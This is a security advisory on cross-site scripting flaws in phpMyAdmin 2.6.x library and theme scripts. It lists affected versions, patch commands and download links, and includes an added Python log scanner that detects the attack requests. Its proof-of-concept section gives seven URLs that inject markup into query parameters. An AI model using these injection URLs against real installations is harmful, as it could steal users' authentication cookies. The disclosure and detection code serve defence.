PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
BID:12644
Info
| Bugtraq ID: | 12644 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2005 12:00AM |
| Updated: | Feb 24 2005 12:00AM |
| Credit: | Maksymilian Arciemowicz is credited with the discovery of these issues. |
| Vulnerable: |
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
phpMyAdmin phpMyAdmin 2.6.1 -rc1
phpMyAdmin phpMyAdmin 2.6.1
phpMyAdmin phpMyAdmin 2.6 .0pl3
phpMyAdmin phpMyAdmin 2.6 .0pl2 |
| Not Vulnerable: |
phpMyAdmin phpMyAdmin 2.6.1 pl1 |
Discussion
Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
No exploit is required to leverage any of these issues. The following proofs of concept have been provided:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
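The URLs above all request a library include file or a theme stylesheet directly and pass markup in a query parameter. As an added example (not part of the advisory or of phpMyAdmin), the following Python code flags such requests in web-server access logs; the Apache-style log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths named in the advisory's proof-of-concept URLs: include files and
# theme stylesheets that are not meant to be requested directly with parameters.
DIRECT_PATH = re.compile(
    r"/(libraries/[\w.]+\.lib\.php|themes/[\w.-]+/css/[\w.]+\.css\.php)$")
# Characters that break out of an HTML attribute or element context.
MARKUP = re.compile(r'[<>"\']')
# Request field of an Apache-style access log line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return names of query parameters carrying markup when the path is a
    direct request to a library or theme script; otherwise an empty list."""
    parts = urlsplit(target)
    if not DIRECT_PATH.search(parts.path):
        return []
    # parse_qsl percent-decodes names and values, so %22%3E becomes ">.
    return [name
            for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if MARKUP.search(value)]

def scan(lines):
    """Yield (request target, flagged parameter names) for matching log lines."""
    for line in lines:
        m = REQUEST.search(line)
        if m:
            flagged = suspicious_params(m.group(1))
            if flagged:
                yield m.group(1), flagged

# Constructed sample log lines (not from the advisory); the markup is the
# harmless <H1> probe already shown in the advisory's URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Feb/2005:10:00:01 +0000] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Feb/2005:10:02:13 +0000] "GET /phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS HTTP/1.1" 200 310',
    '192.0.2.44 - - [24/Feb/2005:10:02:20 +0000] "GET /phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&row_no=%22%3E%3CH1%3E HTTP/1.1" 200 280',
    '192.0.2.10 - - [24/Feb/2005:10:03:00 +0000] "GET /phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=Arial HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for target, names in scan(SAMPLE_LOG):
        print(names, target)
```

Only the second and third sample lines are reported: the first is an ordinary page request, and the fourth hits a theme stylesheet with a plain font name.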
Solution / Fix
Solution:
The vendor has released an upgrade dealing with these issues.
Gentoo has released advisory GLSA 200503-07 to address various issues in phpMyAdmin. Please see the referenced advisory for more information. Gentoo users may carry out the following commands to update their computers:
emerge --sync
emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.1_p2-r1"
SUSE has released advisory SUSE-SR:2005:007 to address these issues. Please see the referenced advisory for more information.
phpMyAdmin phpMyAdmin 2.6 .0pl3
- phpMyAdmin phpMyAdmin 2.6.1-pl1
  http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar.gz?download
phpMyAdmin phpMyAdmin 2.6 .0pl2
- phpMyAdmin phpMyAdmin 2.6.1-pl1
  http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar.gz?download
phpMyAdmin phpMyAdmin 2.6.1 -rc1
- phpMyAdmin phpMyAdmin 2.6.1-pl1
  http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar.gz?download
phpMyAdmin phpMyAdmin 2.6.1
- phpMyAdmin phpMyAdmin 2.6.1-pl1
  http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar.gz?download
References
References:
- [ 1149383 ] (in 2.6.1-pl1) Possible XSS Attacks (phpMyAdmin)
- Main Vendor Homepage (OWASP)